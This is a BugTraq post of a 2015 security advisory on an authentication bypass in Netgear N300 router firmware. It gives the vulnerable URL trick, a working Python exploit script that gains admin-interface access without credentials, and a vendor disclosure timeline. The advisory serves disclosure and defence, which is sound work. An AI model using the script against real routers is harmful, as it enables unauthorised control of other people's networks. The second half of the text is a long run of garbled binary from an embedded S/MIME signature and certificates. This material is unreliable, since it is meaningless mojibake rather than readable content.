BugTraq
Authentication Bypass in Netgear Router Firmware N300_1.1.0.31_1.0.1.img and N300-1.1.0.28_1.0.1.img Oct 06 2015 02:59PM
Alexandre Herzog (Alexandre Herzog csnc ch)
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Netgear Router Firmware N300_1.1.0.31_1.0.1.img
# and N300-1.1.0.28_1.0.1.img
# Vendor: NETGEAR
# CVE ID: requested
# Subject: Authentication Bypass
# Risk: High
# Effect: Remotely exploitable over LAN/WLAN
# Author: Daniel Haake (daniel.haake (at) csnc (dot) de [email concealed])
# Date: 06.10.2015
#
#############################################################

Introduction:
-------------
Multiple NETGEAR wireless routers are out of the box vulnerable
to an authentication bypass attack. No router options has to
be changed to exploit the issue. So an attacker can access the
administration
interface of the router without submitting any valid username and
password, just by requesting a special URL several times.

Affected:
---------
- Router Firmware: N300_1.1.0.31_1.0.1.img
- Router Firmware; N300-1.1.0.28_1.0.1.img
- tested and confirmed on the WNR1000v4 Router with both firmwares
- other products may also be vulnerable because the firmware is used in
multiple devices

Technical Description:
----------------------
The attacker can exploit the issue by using a browser or writing a simple
exploit.
1. When a user wants to access the web interface, a http basic
authentication login process is initiated
2. If he does not know the username and password he gets redirected to the
401_access_denied.htm file
3. An attacker now has to call the URL
http://<ROUTER-IP>/BRS_netgear_success.html multiple times
-> After that if he can access the administration web interface and there is
no username/password prompt

Example Python script:
----------------------
import os
import urllib2
import time
import sys

try:
first = urllib2.urlopen("http://" + sys.argv[1])
print "No password protection!"
except:
print "Password protection detected!"
print "Executing exploit..."
for i in range(0,3):
time.sleep(1)
urllib2.urlopen("http://" + sys.argv[1] +
"/BRS_netgear_success.html")

second = urllib2.urlopen("http://" + sys.argv[1])
if second.getcode() == 200:
print "Bypass successfull. Now use your browser to have a
look at the admin interface."

Workaround/Fix:
---------------
None so far. A patch already fixing this vulnerability was developed by
Netgear but not released so far
(see timeline below).

Timeline:
---------
Vendor Status: works on patch-release
21.07.2015: Vendor notified per email (security (at) netgear (dot) com [email concealed])
-> No response
23.07.2015: Vendor notified via official chat support
24.07.2015: Support redirected notification to the technical team
29.07.2015: Requested status update and asked if they need further
assistance
-> No response
21.08.2015: Notified vendor that we will go full disclosure within 90 days
if they do not react
03.09.2015: Support again said that they will redirect it to the technical
team
03.09.2015: Netgear sent some beta firmware version to look if the
vulnerability is fixed
03.09.2015: Confirmed to Netgear that the problem is solved in this version
Asked Netgear when they plan to release the firmware with this
security fix
11.09.2015: Response from Netgear saying they will not disclose the patch
release day
15.09.2015: Asked Netgear again when they plan to publish the security fix
for the second time
-> No response
29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS
06.10.2015: Forced public release of this advisory to follow up on [2]

References:
-----------
[1] http://support.netgear.com/product/WNR1000v4
[2]
http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v
5.ht
ml
0? *?H?÷
 ?0?1 0 +0? *?H?÷
 ??0?½0?¥ OÔ/T»/K0
 *?H?÷
0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20
061025083246Z
361025083246Z0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20?"0
 *?H?÷
?0?
?Äñ?Óx1÷8ÉøÃ?C¼Ç÷¼7çNqºK¥s\n?®W®87C/=ÈÎhÁx®+ú,y?öè¹h¹UòD§9
ùü?ñ¢M'ùa{º·å¢¶ëa>ÐlÑæûú^í´? 5[¡?ËðI?þ?
>æÙ âO»Ü?7ü?é25"Ñ:N'?°?2Úa
GM`B®?Gè?ZPXé??¹]¡ÜÝ?J6g»Hä?¶7ëH:¯gèÊïj1?ÔÀ¶ù?q{gd¸¶?JB{e.0j õî?æòÍ?ìÙ¡Jìö²KåE?æmx?.??m6©Ä1d?? *ô5
xÉUÏA°Gé0??¾a¨?¹(z_8Ù©8°?sÁÃ;H*?!?¸Ì¨5Ã??³>¾¤?i:?xÙÉô?«V~[??9?¤
, 2?`³?À*¶ ~IòJùÕF/?£?§&¬»?<æ¼GÜsQñpd/ù´G0lDê)7??hf¼?8þ{9.ÓPðû^
`¶©¦ú'Añ?ròõ?tJÉgÄT®Hdß?Ñn°á??qéLØ¥÷GtÑQ??ó¢#@ sÛK¦çs?Á éÁY¬Fú
æ/øÏq?Fm¹Ä8yEHïÄ]×î?9"?²
XC÷q©H.ýêÖ£¬0©0Uÿ0Uÿ0ÿ0U ÍÁäA
¶:[;ËE½Â?ú?X0U#0? ÍÁäA¶:[;ËE½Â?ú?X0FU ?0=0; `?tY0.0,+ http://repository.swisssign.com/0
 *?H?÷
?sƁà'Ò-à?0â?AP,__ba©?ji tIÖ]?êARoX­PV jƽ(iX?Ü?5©:¼¥`?ØE?iÙ~»xrÁ*Ώ?pa¬ Í ¸9)V?2N?»=Ä*Ù×rîþQ¡"A±qc?°
b«^WßËÝu À]y?àPæÞ1þ?{p_¥Ø­ø¶oÓ`Ý@K"Å=­:z?G?y3º?Ü2i?nKðqþãgr ±¿
\?äú?"Ç?¹#??í%àÏe»õaïݲZA"Z¡?],è[Ém© xª`ÆVZ h¼iyÄ~?¿Åé$Q^ÔÕKSíÙ#Z6e£Á­A0óF?¯eµÕ±ä[xu?zmY©*{ÞÃ???IsxÈ=½Q5t
*Õñ~i*»;½%¸?Z=raf?î ÖMÔt jþ ü£UW?þJË®[Èò#1S8Ò-j??¹j÷^AtnÃ~¬)`??8ÊW
½0/Ç¥æA Ú®?? ¤elL ?º¸Ó¹À??0úå?kNgªÚbV>?fÒÄ6}§>ü?àÔ?彪óN£zjùbrã Oë?#ñ?»|ÜÜl?%²ò´cÒ*g??õÎêØ?jìä
»*Lë `9ÎÊbØ.n0?ù0?á `M©%Û¥?´×20ü0
 *?H?÷
 0V1 0 UCH10U
 SwissSign AG100.U'SwissSign Personal Silver CA 2014 - G220
150817060212Z
180817060212Z0I10U Email Validated Only1(0&UEmail: alexandre.herzog (at) csnc (dot) ch0 [email concealed]?"0
 *?H?÷
?0?
???Csb U?ïÒ0ô9Å°ò SÚ?6ÇïIÓ"ªì3%?Dë|?Э÷îÆ¥w·VÂ)??ØnüÇ¢?BÎ÷¨eò¬=+%x-û¬ËÚ?.?¹è1)cÄ`
6ó[ÎY©C?{sëi=áK?#$?o?k?z¦?Ãé:t?szÀ~ùAsê/qº¦èOù??½ypߣu?eüp0?ýée·Z
?Ç?-¼??M?h(ö[pgÉ=lzÛ??Mn1à"?ZP??RÞD<¢Ç'·zk?ÆΧ8?ÔRÁO
?¡½sP??Î?G?Io?
w3`°'ª±rá0q?]·£?Ï0?Ë0Uÿ°0U% 0
+0U iP?ÍbSÿ³¬ïi ^?Q·Å0U#0?ðÇ£2?µëʵXw§N¾]aC%0ÿU÷0ô0G E C?Ahttp://crl.
swisssign.net/F0C7A33291B5EBCAB5587715A74EBE1A5D6143250¨ ¥ ¢??ldap:/
/directory.swisssign.net/CN=F0C7A33291B5EBCAB5587715A74EBE1A5D614325%2CO
=SwissSign%2CC=CH?certificateRevocationList?base?objectClass=cRLDistribu
tionPoint0aU Z0X0V `?tY0I0G+;http://repository.swisssign.com/SwissSign-Silve
r-CP-CPS.pdf0Ù+Ì0É0d+0?Xhttp://swisssign.net/cgi-bi
n/authority/download/F0C7A33291B5EBCAB5587715A74EBE1A5D6143250a+0
?Uhttp://silver-personal-g2.ocsp.swisssign.net/F0C7A33291B5EBCAB5587715
A74EBE1A5D6143250#U0alexandre.herzog (at) csnc (dot) ch0 [email concealed]
 *?H?÷
 ?j¹#®?13,î®!?ùÇ?7?ÂÀ´?Ù?+¸?õJúðc?f¯xè?xGµ?4w_è|ÐÌ[
P£cq·4Ñ>Ýå 
?7óMÁTï&Ýv:Ö;M?~¨6;ÿÁ?}i`_4??÷¡ÙÖ»SçÙ"?zpº¯ÇÏp4?'´íMQ? ?XÁ>?fææ?7vaC_ldß?Te³®¶¿°Â¤þ¶Ï¿©¯:?ZQ*w7W¡9>KXIIÌÉí¥G)e½1 ?&UtÔ9íºöEüÄgÃó8©|«?ÓLjÅq7áºO\0?ª/<y?n6}i(ù?Ï0?¾0?¦ DÖN­Ó6Õ
2@]¹60
 *?H?÷
 0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20
140919203649Z
290915203649Z0V1 0 UCH10U
 SwissSign AG100.U'SwissSign Personal Silver CA 2014 - G220?"0
 *?H?÷
?0?
?Ë9±9?þúÉ¡¼Ã?©J-?rÿhŧÄìר?³Ñ?@ÜSo=ìèdµ?Û?¼¨¨À?8X^+æÊ0ï²ë
9?G*!årÍÂ1bÌV*ÿwÄc??Âox×µ¶Ìé}3¦?*þÑRÖôì?þMLjRá?vb»¹hæRcüÁ!??]ØÜ?Ñã
IWD?«)É/úÆmk
¡ö÷ÿka5&??i%]i÷½^k?ِ ùC"Ië6Ð Zcã8!Õ+A?Fzògè¤Ðº$'u??I-VÄT3?bùÕ_Þ[©???SÁ?é ´?)2¡Ð¯§£??0??0Uÿ0Uÿ0ÿ0UðÇ
£2?µëʵXw§N¾]aC%0U#0? ÍÁäA¶:[;ËE½Â?ú?X0ÿU÷0ô0G E C?
Ahttp://crl.swisssign.net/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580¨ ¥
 ¢??ldap://directory.swisssign.net/CN=17A0CDC1E441B63A5B3BCB459DBD1CC2
98FA8658%2CO=SwissSign%2CC=CH?certificateRevocationList?base?objectClass
=cRLDistributionPoint0aU Z0X0V `?tY0I0G+;http://repository.swisssign.com/SwissSign-Silve
r-CP-CPS.pdf0Æ+¹0¶0d+0?Xhttp://swisssign.net/cgi-bi
n/authority/download/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580N+0
?Bhttp://ocsp.swisssign.net/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580
 *?H?÷
 ?Ãy§W·{­QhõD?A?(|tÖ;j¼mï§×M9?hÊÙÐq±5?o?ÆI¸QîLùl
oØ¥ûþû0^Ò?«ÄQºª?«jÝ×+J÷²kQÏt[)¢sÞ?þØO !}i °PåX??.åÝczªïùÃi?ä?qb\Bî:òÍàï?\éÎS(2ì? T¢!úP§O¼{²k?)?w>Ê#ÇiZA}
f1ozqyÚ©e:ë×Õ _T|Î7%$?PЯ@4Â_?âz?ó/BG?<BûÙ_¥¼pE?ï 9õ¡xl×ÀgYáÞ\üxèO
Ý»¬?.r?üêGoC(¼»¹??¾úPÝP?L¶vÿÃG
Y´ÍmUØj¶_É/Á?6>¾®@5 íàL-4EC¯¢ôؐåÐÀ?D@®<?Q¼?hsi{uX?·ÔOßñ?q{üweUc×Rr|Ý1G?§?ج&q=#æ;
ô???þ+ê ó&
uÆ?1 çG¡ç©j°¥²Ü=СãnÕðf¦}×??M qçsçsäTeiü7ñopî§l³REgYÖH±!é?(ÙÙô´¦ g#6¼
`G\(]??1º16ÇzBo Ál*øjÙ?2»=U±Åá
±ywTà3?~îê1??0??0i0V1 0 UCH10U
 SwissSign AG100.U'SwissSign Personal Silver CA 2014 - G22`M©%Û¥?´×20ü0 + ?0 *?H?÷
 1  *?H?÷
0 *?H?÷
 1
151006143301Z0# *?H?÷
 1tïÆhÚÐ~Véëw.(c?µ¯?Ð0x +?71k0i0V1 0 UCH10U
 SwissSign AG100.U'SwissSign Personal Silver CA 2014 - G22`M©%Û¥?´×20ü0z *?H?÷
  1k i0V1 0 UCH10U
 SwissSign AG100.U'SwissSign Personal Silver CA 2014 - G22`M©%Û¥?´×20ü0« *?H?÷
 10?0  `?He*0  `?He0
*?H?÷
0  `?He0*?H?÷
?0+0
*?H?÷
@0
*?H?÷
(0+0  `?He0  `?He0  `?He0
 *?H?÷
?y¬?a®+Ó£ñ~Sq?¼? +
¢/F±YX?ÁRfò©?7õuIÐV?¾+õ:sê³!xÑþ<{T×oø}??³ô,?|²ä{Aï  èýúR*ËdSt
\\:18ÃÎñ?+«?Ü0p_µ1õV?ÝÙd?ÜKö3eá`"Í/éä:?|}& ¿aM%áU O¢wôc
3Râ?z¬ëHd3¥*1­IÓ¹Ç÷?æÇ"aÆ??Ä? Ååöä^vPÜ&R ønðbÖhFwêß[[«Ôò U¶Ì
´?Kx3´¶
2Ñ?Pµ©õGú?]íùsò?_¬

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus